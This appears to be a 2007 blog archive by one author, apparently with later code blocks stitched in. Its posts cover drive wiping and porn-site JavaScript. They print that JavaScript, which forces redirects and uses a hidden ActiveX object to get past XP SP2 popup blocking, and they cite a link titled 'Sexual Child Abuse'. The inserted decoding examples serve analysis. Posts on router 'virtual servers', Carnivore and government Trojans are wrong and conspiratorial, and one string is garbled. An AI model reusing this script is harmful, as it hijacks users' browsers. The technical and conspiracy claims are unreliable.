Archive for May, 2007

Drive Wiping Basics

May 24, 2007

When it comes to life you can either wipe or clean with a bidet. When it comes to a hard drive you can only wipe and on some days everybody knows that can be a messy operation and is sometimes not quite complete.

I use Iolo Drive Scrubber which is OK but it has limits and most of the limits have very little to do with how many times you wipe. They have to do with what you wipe.

Once again, let’s start with forgetting all you think you know. A big magnet is not a Gaussian chamber and setting a big magnet on your hard drive is a waste of time.

The next question is how many times you wipe, and my answer is: why bother with more than one on any drive you know is there? For instance, when I mount Iolo Drive Scrubber in my CD-ROM on my new computer, it locates an A and C drive and on my old computer it locates A, B and C drives. Funny thing is, my new computer doesn’t have an A drive and after a while I got curious. This so-called A drive is inaccessible by Fdisk using Windows 98 and I can’t access it by any method I’m aware of. So one day I decided to wipe all drives and guess what, it exists and takes up space on the hard drive.

On a new drive you may not miss 1 gig out of 100 but when it reports your 10 gig drive is a 9, you have to wonder what is stored in the lost area. When you wipe an empty drive (i.e. The B Floppy drive) it tells you there is no media to wipe yet when you scrub the identified A:/ drive it wipes it.

So how many wipes do I use? Where I can search the drive myself and it’s clean, I use 1 wipe with a zero overlay and confirmation. If I can search it myself and I suspect it’s got nasties on it, I use 7 wipes and a zero overlay. And in the area I can’t access, that mysterious A drive, I use a 35 pass Gutmann wipe which doesn’t take that much time on the much smaller space. Even if it’s only a light 1 pass sweep on the C:\ drive, I do 35 passes on the so-called A:\ drive because I don’t know what’s there and I didn’t put it there.

So do I consider my drive clean – not if my life depends on it.

Seems there’s another nasty piece of work called “Dynamic Drive Overlay” or DDO which creates an “unwipeable” area on your hard drive. This survives operating system changes from Linux to Windows and back, Fdisk, formatting and drive wiping.

More about this when I learn to hack that crap and properly wipe myself.

PS: When the drive contents scare me, I drop it in a bucket and cover it with muriatic acid. Do that outside because this creates a real stinkpot.

Some code from a dangerous site.

May 20, 2007

OK, someone has been tormenting me with search terms to check up on teens18.biz which shows up in the code for young-models.org and the code is pretty much the same. A third site is named in the following segment but I will not go to the third site named as teens18.biz was even more disgusting than young-models.org and the only thing worse would be for adultsex.ws to be snuff flicks. You can read more about this trilogy of shit sites at the Fat Savage Blog.

    {
      var j = i + alen;
      if (document.cookie.substring(i, j) == arg) {
        return getCookieVal(j);
      }
      i = document.cookie.indexOf(" ", i) + 1;
      if (i == 0) break;
    }
    return "";
  }
  function mkla() {
    window.location.replace('http://adultsex.ws/out.php?s_id=4');
    if (getCookie('teens18.biz') != 'visited') {
      popURL = 'http://adultsex.ws/out.php?s_id=9';
    } else {
      popURL = 'http://young-models.org/?from=pics4you.org&type=blur';
    }
    window.open(popURL).blur();
  }

The new improvement in data transmission is the unusual style of the URL behind each link: the real destination is passed as a parameter, with its punctuation written as hex (percent-encoded) to hide it. A typical link from a picture reads as follows.

href = 'go.php?link=t2/93.jpg&url=http%3A%2F%2Fteens18.biz%2Fc.php%3Fs%3D100'

Practice your hex translation – this one ain’t that tough.
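
Added example, not code from the original post or from the site: the link quoted above can be read by parsing it instead of clicking it. The `redirector.invalid` base and the function names are assumptions made for the example, since the post gives only the relative href.

```javascript
// Constructed base: the post quotes only a relative href, so a placeholder
// origin is supplied to let the URL parser resolve it.
const PLACEHOLDER_BASE = "http://redirector.invalid/";

// Link text as quoted in the post above.
const SAMPLE_HREF =
  "go.php?link=t2/93.jpg&url=http%3A%2F%2Fteens18.biz%2Fc.php%3Fs%3D100";

// Return a URL object if the value is an absolute http(s) URL, else null.
function asAbsoluteUrl(value) {
  try {
    const u = new URL(value);
    return u.protocol === "http:" || u.protocol === "https:" ? u : null;
  } catch {
    return null;
  }
}

// Walk the query string and follow any parameter whose decoded value is itself
// a URL. Nothing is fetched; this is string parsing only.
function unwrapRedirect(href, base = PLACEHOLDER_BASE, maxDepth = 5) {
  const hops = [];
  let current = new URL(href, base);
  for (let depth = 0; depth < maxDepth && current; depth++) {
    const params = {};
    let next = null;
    for (const [key, value] of current.searchParams) {
      params[key] = value; // URLSearchParams has already percent-decoded it
      if (!next) next = asAbsoluteUrl(value);
    }
    hops.push({ host: current.hostname, path: current.pathname, params });
    current = next;
  }
  return hops;
}

console.log(JSON.stringify(unwrapRedirect(SAMPLE_HREF), null, 2));
```

The second hop shows where the click is really headed and which parameter (`s`) travels with it.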

Click a Link – I Dare You!

May 19, 2007

Did you ever wonder how much information you give away when you click a link? Now the following link is kind of explicit and maybe anybody who clicks it ought to be in jail for stupidity alone. After all, it comes from a porn site and is offering links to top ten porn sites, girls gone wild, bisexual women, hot single woman, nude strippers and:

Sexual Child Abuse

Now obviously, it’s from a honeypot and whether out of moral values or fear of the law, you should never click a link until you can read the code underneath. The above link was made live with the crap from kahaity.front.ru which is close enough to kiddie porn to get in trouble with the Law. The following code has had the identification altered just in case the identification number was tied to me and my machine. So here’s the code that carries the information to whoever operates the server.

href="http://femalesex.com/Sexual_Child_Abuse.cfm&
pt=2&
vid=—7-51-055_-X04X969-31447&
rpt=2&
kt=5&
kp=2"
target="_top"
onmouseover="changeStatus('Sexual Child Abuse');return true;"
onmouseout="changeStatus('');return true;"
title="Sexual Child Abuse"
id="sk2"
name="sk2" >Sexual Child Abuse

The opening (a) and closing (/a) have been omitted in order to read the code. Do what you want, but I would never click a link from a honeypot that changes my status to “Sexual Child Abuse”. I may click a link to teens, young or otherwise to rip the code, but anything that clearly says “Sexual Child Abuse” on a porn site cannot be interpreted in more than one way.

There are just some things in life that I really don’t want to see or know.

Stalking the Carnivore.

May 13, 2007

Never believe that the FBI’s Carnivore is extinct. Like any other animal it actually leaves tracks while stalking you. This program is done in cooperation with your local ISP and for some reason contact is made through them. This is like a lion using a gazelle as a front to stalk a human.

It seems if you are using Norton Internet Security, your very first online update is controlled through a contact with your local ISP. If you’re using PC-cillin, you have incessant messages that your local ISP is attempting to make contact with your machine through a wireless connection – even when you’re using a LAN.

The real proof comes when you check your Virtual Server Setup on your Internet router and all of a sudden the epiphany hits and you want to puke – not out of fear but disgust at what your government is doing to its citizens in the name of security.

A virtual server is a method of partitioning your hard drive such that every partition can operate as an independent machine. Each server will have its own full-fledged operating system and each server can be independently rebooted. Remember when I complained about sneak-and-peek warrants and someone turning on my machines? Remember when I complained about my rapidly shrinking hard drive? Seems all those other independently operating servers take space and can be rebooted by their controller without being present. No shit, this explains it all.

Right now my machines are set up by someone other than me to allow traffic from Virtual Servers through a private IP of 0.0.0.0 which you may recall is the IP on the router which bypasses the firewall. I have virtual servers to handle FTP (Ports 20/21), HTTP (port 80), HTTPS (port 443), DNS (port 53), SMTP (port 25), POP3 (port 110), and Telnet (port 23). Hey those are all pretty normal servers and the Russian mafia might want to use them.

How about i2eye (port 1720)? This is patent pending technology from D-Link, which happened to manufacture my router. It was designed originally for enhanced streaming video technology to televisions, so I’m not sure why it’s on my machine as I have never knowingly downloaded an audio or video, and don’t have a TV card. Also, I reset the router to factory defaults three times in the past week so none of this crap should be on it.

Of course PPTP was enabled through port 1723 which allowed the virtual machine to operate on a point to point contact basis through a secure channel using IPSec on port 500. No wonder I can’t figure out how to find out what’s stored on my machines or how to remove it. The machines have their own operating systems, have encrypted content, unique encoded keys and are immune from programs which can snoop on them.

How do I know it’s Carnivore? Easy.

DCS 1000 is also on my machine operating through port 80. This is the new user friendly name for the FBI’s Carnivore which sounded too much like a predator.

With all this shit on my machine, it’s hard to tell what is real and what’s not. Have I been getting valid research and making actual posts or just looking at the results from virtual servers on my own machine?

And I thought The Truman Show was a fucked up movie.

Post script. So in order to get the post on line I wiped out all of that shit and reset the router while it was off line. It added NetMeeting at port 1720 and DSC-2000 to the virtual server list – Cool Technology??????

Code Translation for Young-models.org

May 11, 2007

This is the best translation I can do from the code at young-models.org.
Anyone want to explain it all? It starts with standard script opening and ends with standard closing. Have fun figuring it out – you too can visit young-models.org and get fucked.

self.focus();
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
var xren=true;
function pleaseclick() {
  if (xren) {
    self.focus();
    setTimeout('pleaseclick()',90000)
  }
}
function mkla2() { pleaseclick(); }
document.write(unescape('1310";1310999iie.launchURL(popURL);131099}13109}1310}1310function ver(){13109isXPSP2 13101310'));
function getCookieVal(offset) {
  var endstr = document.cookie.indexOf(";", offset);
  if (endstr == -1) {
    endstr = document.cookie.length;
  }
  return unescape(document.cookie.substring(offset, endstr));
}
function getCookie(name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i

Code Break use a less than sign and space
use the word “clen”
close parentheses
Back to code

    {
      var j = i + alen;
      if (document.cookie.substring(i, j) == arg) {
        return getCookieVal(j);
      }
      i = document.cookie.indexOf(" ", i) + 1;
      if (i == 0) break;
    }
    return "";
  }
  function mkla() {
    window.location.replace('http://the-hun.ws/out.php?s_id=8');
    if (getCookie('young-models.org') != 'visited') {
      popURL = 'http://the-hun.ws/out.php?s_id=9';
    } else {
      popURL = 'http://teens18.biz/?from=pics4you.org&type=blur';
    }
    window.open(popURL).blur();
  }

What I understand looks ugly!

Porn Site Script – The rest

May 10, 2007

This is the rest of the Javascript in the header from young-models.org

    {
      var j = i + alen;
      if (document.cookie.substring(i, j) == arg) {
        return getCookieVal(j);
      }
      i = document.cookie.indexOf(" ", i) + 1;
      if (i == 0) break;
    }
    return "";
  }
  function mkla() {
    window.location.replace('http://the-hun.ws/out.php?s_id=8');
    if (getCookie('young-models.org') != 'visited') {
      popURL = 'http://the-hun.ws/out.php?s_id=9';
    } else {
      popURL = 'http://teens18.biz/?from=pics4you.org&type=blur';
    }
    window.open(popURL).blur();
  }

Don’t forget the proper closing and opening!

This is truly nasty shit. I’ll publish the translation of the hex part tomorrow.

Porn Site Script – Active Line

May 10, 2007

This is the next line, which causes the rest to activate in WordPress without even defining the script or code start:

a less than symbol;
the word: clen
a close parenthesis;

I can’t even type it as 2 symbols and the word “clen” in between or it disappears.

Of course this is all from young-models.org that delivers some really nasty shit.

Porn Site JavaScript

May 9, 2007

This is part of the code which I got to print by eliminating the script language definition and the opening:

self.focus();
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
var xren=true;
function pleaseclick() {
  if (xren) {
    self.focus();
    setTimeout('pleaseclick()',90000)
  }
}
function mkla2() { pleaseclick(); }
document.write(unescape('%3Cscript%20language%3DJavaScript%3E%0D%0A%3C%21--%0D%0Avar%20isXPSP2%20%3D%20false%3B%0D%0Avar%20doExit%20%3D%20true%3B%0D%0Avar%20popURL%20%3D%20%27http%3A//the-hun.ws/out.php?s_id=1%27%3B%0D%0Avar%20prevURL%20%3D%20%27http%3A//the-hun.ws/out.php?s_id=1%27%3B%0D%0Aeval%28%22window.attachEvent%28%27onload%27%2Cver%29%3B%22%29%3B%0D%0Aeval%28%22window.attachEvent%28%27onunload%27%2Cext%29%3B%22%29%3B%0D%0Afunction%20ext%28%29%7B%0D%0A%09if%20%28isXPSP2%29%7B%0D%0A%09%09window.location.replace%28prevURL%29%3B%0D%0A%09%09if%20%28doExit%29%7B%0D%0A%09%09%09popURL%20%3D%20popURL%20+%20%27%26%26_blank%27%3B%0D%0A%09%09%09document.body.innerHTML+%3D%22%3Cobject%20id%3Diie%20width%3D0%20height%3D0%20classid%3D%27CLSID%3A6BF52A52-394A-11D3-B153-00C04F79FAA6%27%3E%3C/object%3E%22%3B%0D%0A%09%09%09iie.launchURL%28popURL%29%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D%0D%0Afunction%20ver%28%29%7B%0D%0A%09isXPSP2%20%3D%20%28window.navigator.userAgent.indexOf%28%22SV1%22%29%20%21%3D%20-1%29%3B%0D%0A%7D%0D%0A//--%3E%0D%0A%3C/script%3E%0D%0A'));
function getCookieVal(offset) {
  var endstr = document.cookie.indexOf(";", offset);
  if (endstr == -1) {
    endstr = document.cookie.length;
  }
  return unescape(document.cookie.substring(offset, endstr));
}
function getCookie(name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i

The last part doesn’t want to print without executing. Will expand this when I figure out how.
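
Added example, not part of the original post or the site's code: one way to read a `document.write(unescape(...))` payload without running it is to treat the whole script as text and decode the string literal yourself. The sample is a shortened excerpt of the string quoted above, and the function names are made up for the example.

```javascript
// Shortened excerpt of the document.write(unescape('...')) call quoted in the
// post above; which statements to keep is a choice made for this example.
const SAMPLE_SOURCE =
  "self.focus(); document.write(unescape('" +
  "%3Cscript%20language%3DJavaScript%3E%0D%0A" +
  "var%20popURL%20%3D%20%27http%3A//the-hun.ws/out.php?s_id=1%27%3B%0D%0A" +
  "eval%28%22window.attachEvent%28%27onload%27%2Cver%29%3B%22%29%3B%0D%0A" +
  "eval%28%22window.attachEvent%28%27onunload%27%2Cext%29%3B%22%29%3B%0D%0A" +
  "document.body.innerHTML+%3D%22%3Cobject%20id%3Diie%20width%3D0%20height%3D0%20" +
  "classid%3D%27CLSID%3A6BF52A52-394A-11D3-B153-00C04F79FAA6%27%3E%3C/object%3E%22%3B%0D%0A" +
  "iie.launchURL%28popURL%29%3B%0D%0A%3C/script%3E%0D%0A'));";

// Same mapping as the legacy unescape(): each %XX or %uXXXX becomes one UTF-16
// code unit; malformed sequences are left as-is instead of throwing.
function percentDecode(text) {
  return text.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

// Find every unescape('...') literal, decode it as data, and pull out the
// strings worth triaging first. Nothing is eval'd or written into a page.
function triage(source) {
  const call = /unescape\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  return [...source.matchAll(call)].map((match) => {
    const decoded = percentDecode(match[2]);
    return {
      decoded,
      urls: [...new Set(decoded.match(/https?:\/\/[^\s'"<>]+/g) || [])],
      clsids: decoded.match(/CLSID:[0-9A-Fa-f-]{36}/g) || [],
      events: [...decoded.matchAll(/attachEvent\('(\w+)'/g)].map((m) => m[1]),
      nestedEval: /\beval\s*\(/.test(decoded),
    };
  });
}

for (const f of triage(SAMPLE_SOURCE)) {
  console.log(f.decoded);
  console.log({ urls: f.urls, clsids: f.clsids, events: f.events, nestedEval: f.nestedEval });
}
```

Run it under Node rather than in a browser tab, so the decoded script is only ever a string.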

Window Washer Sucks

May 8, 2007

Well this is a site about government porn sites, government cooperation with security firms and all that nasty stuff. So when you think of all the things sucking on those sites, there’s room for one more.

I have my Window Washer set up and updated so it should have been able to defend itself. It was programmed to run on shutdown and again on start up. So after I just started up and it ran, I checked my index.dat files. There were 69 items in history, 31 cookies and 1055 items in cache files with some of them being porn images.

I thought it was supposed to wash all traces of my windows path.

One word!

Bullshit.

Good God, All Hell’s Breaking Loose!

May 8, 2007

You can always tell you’re right when the people in power get pissed off. I mean, if there were no military strength Trojans creating inaccessible partitions to hide shit, if young-models.org weren’t delivering those military strength Trojans to both Linux and Windows systems, if the experiments weren’t so reproducible, why would anybody fuck with my ability to use looking glass sites to track the IP of young-models.org to their multiple server locations? I was IP blocked all afternoon after my last few posts.

This is a decided lack of military inelegance [oxymoron at best] as it seems to confirm that the publication of porn from the government archive is a government operation.